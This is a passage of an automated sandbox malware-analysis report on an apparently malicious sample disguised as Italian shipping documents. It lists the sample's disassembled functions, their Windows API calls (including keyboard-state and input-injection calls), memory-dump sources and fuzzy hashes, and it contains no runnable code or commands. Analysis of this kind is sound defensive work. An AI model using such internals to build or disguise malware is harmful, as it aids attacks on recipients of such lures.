                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                        • ExitThread.KERNEL32 ref: 00413D4E
                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                        • __freefls@4.LIBCMT ref: 00413D74
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 259663610-0
                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                        Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?,?), ref: 004302E6
                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                        • GetClientRect.USER32(?,?), ref: 00430364
                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                        • GetWindowRect.USER32(?,?), ref: 004303C3
                        • ScreenToClient.USER32(?,?), ref: 004303EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$MetricsScreenSystem
                        • String ID:
                        • API String ID: 3220332590-0
                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                        Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _malloc_wcslen$_strcat_wcscpy
                        • String ID:
                        • API String ID: 1612042205-0
                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                        Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove_strncmp
                        • String ID: >$U$\
                        • API String ID: 2666721431-237099441
                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                        Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044C570
                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$InputSend
                        • String ID:
                        • API String ID: 2221674350-0
                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                        Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcscpy$_wcscat
                        • String ID:
                        • API String ID: 2037614760-0
                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                        Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                        • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                        • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$Copy$AllocClearErrorLastString
                        • String ID:
                        • API String ID: 960795272-0
                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                        Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                        Download Yara Rule
                        APIs
                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                        • EndPaint.USER32(?,?), ref: 00447D13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 4189319755-0
                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                        Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow$InvalidateRect
                        • String ID:
                        • API String ID: 1976402638-0
                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                        Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                        Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$Copy$ClearErrorLast
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 2487901850-572801152
                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                        Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$MessageSend
                        • String ID:
                        • API String ID: 1871949834-0
                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                        Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                        Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                        Download Yara Rule
                        APIs
                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                        • SendMessageW.USER32 ref: 00471AE3
                        • DestroyIcon.USER32(?), ref: 00471AF4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                        • String ID:
                        • API String ID: 3611059338-0
                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                        Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DestroyWindow$DeleteObject$IconMove
                        • String ID:
                        • API String ID: 1640429340-0
                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                        Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • _wcslen.LIBCMT ref: 004438CD
                        • _wcslen.LIBCMT ref: 004438E6
                        • _wcstok.LIBCMT ref: 004438F8
                        • _wcslen.LIBCMT ref: 0044390C
                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                        • _wcstok.LIBCMT ref: 00443931
